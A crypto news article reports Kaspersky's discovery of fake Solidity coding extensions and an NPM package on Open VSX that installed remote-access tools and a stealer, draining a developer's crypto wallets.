Malicious code found in fake coding extensions used to steal crypto – Crypto News – Crypto News
Connect with us
Malicious code found in fake coding extensions used to steal crypto Malicious code found in fake coding extensions used to steal crypto

Technology

Malicious code found in fake coding extensions used to steal crypto – Crypto News

Published

3 hours ago

on

Security researchers have found open-source packages targeting developers with malware that steals cryptocurrency. The packages were hosted on the Open VSX repository disguised as tools for working with Solidity, a programming language used in blockchain development. They delivered malware that gave attackers control over victims’ devices and access to sensitive data.

The packages were meant to work with Cursor, a development environment based on Visual Studio Code. Cursor is often used for AI-assisted coding, making it a natural target for attackers looking to reach developers.

Kaspersky’s Global Research and Analysis Team uncovered the issue after a Russian blockchain developer reported an incident. The developer had installed what looked like a regular Solidity extension. Instead, it gave hackers access to his computer. They used that access to steal around $500,000 in cryptocurrency.

The attackers made their fake extension appear more trustworthy by pushing it higher in the repository’s search results by spoofing download numbers – pegging it at 54,000 installs. After being installed, the extension didn’t do anything useful. Instead, it installed ScreenConnect, a remote access tool that gave attackers full control of the machine.

From there, the attackers deployed Quasar, an open-source backdoor, along with a stealer tool. The combination collected data from the victim’s web browsers, email apps, and cryptocurrency wallets, including wallet seed phrases – critical information that allowed the attackers to drain accounts.

Once the original malicious extension was taken down, the attacker reuploaded it and faked more installs – this time claiming two million downloads (the real version of the extension had around 61,000 downloads by comparison). Kaspersky has flagged the fake version again for removal.

Georgy Kucherin, a researcher at Kaspersky, said these kinds of attacks are getting harder to spot. Even experienced developers who understand cybersecurity risks can fall for them, especially in fields like blockchain.

In addition to the fake Solidity extension, the attacker uploaded a malicious NPM package called solsafe, which also delivered ScreenConnect. A few months before that, three other harmful Visual Studio Code extensions – solaibot, among-eth, and blankebesxstnion – were uploaded to the same repository. Those have since been removed.

The attacks highlight how public code repositories are a growing threat vector, especially for developers working in sensitive fields like cryptocurrencies. Malicious packages disguised as helpful tools are proving to be a simple but effective way for attackers to gain access to high-value targets.

See also: Bitcoin’s rise puts cloud mining back on the table

Tags: blockchain, crypto, crypto hack, cryptocurrency, cybersecurity

Related Topics:
Continue Reading

Trending